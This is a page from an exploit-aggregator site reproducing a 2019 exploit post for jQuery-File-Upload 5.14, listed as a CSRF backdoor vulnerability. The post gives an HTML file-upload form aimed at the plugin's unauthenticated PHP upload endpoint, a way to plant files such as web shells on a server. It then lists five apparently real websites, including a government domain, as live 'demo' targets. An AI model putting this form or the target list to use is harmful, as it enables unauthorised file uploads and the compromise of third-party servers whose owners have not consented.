Advertisement






jQuery-File-Upload 5.14 - CSRF Backdoor Access Vulnerability

CVE Category Price Severity
N/A CWE-352 Not specified High
Author Risk Exploitation Type Date
Exploit Alert High Remote 2019-04-28
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019040258

Below is a copy:

jQuery-File-Upload 5.14 - CSRF Backdoor Access Vulnerability
################################################## 
# Exploit Title: jQuery-File-Upload 5.14 - CSRF Backdoor Access Vulnerability 
# Vendor: https://github.com/blueimp
# Download Site: https://github.com/blueimp/jQuery-File-Upload/
# Date: 27/04/2019 
# Exploit Author: ArkealoGeNDz 
# Tested on: Kali linux 2.0 / Mozilla Firefox 
# Vulnerable File : /php/index.php
# Vulnerability : /assets/global/plugins/jquery-file-upload/server/php/index.php
# Post File, Type : {"files":[]}
# CSRF CODE : 

<form enctype="multipart/form-data" action="https://yourwebsite.dz/assets/global/plugins/jquery-file-upload/server/php/index.php" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="512000" />Select Your File : 
<input name="userfile" type="file" />
<input type="submit" value="Upload" />
</form>ArkealoGeNDz

################################################## 
# Demo: 
# https://totohealth.org/assets/global/plugins/jquery-file-upload/server/php/index.php
# http://www.mikweb.com.br/assets/global/plugins/jquery-file-upload/server/php/index.php
# http://jdih.dephub.go.id/assets/global/plugins/jquery-file-upload/server/php/index.php
# https://www.itiox.com/assets/global/plugins/jquery-file-upload/server/php/index.php
# http://simmam.acad.univali.br/webgis/assets/global/plugins/jquery-file-upload/server/php/index.php
################################################# 
# Telegram: @ArkealoGeNDz 
#################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.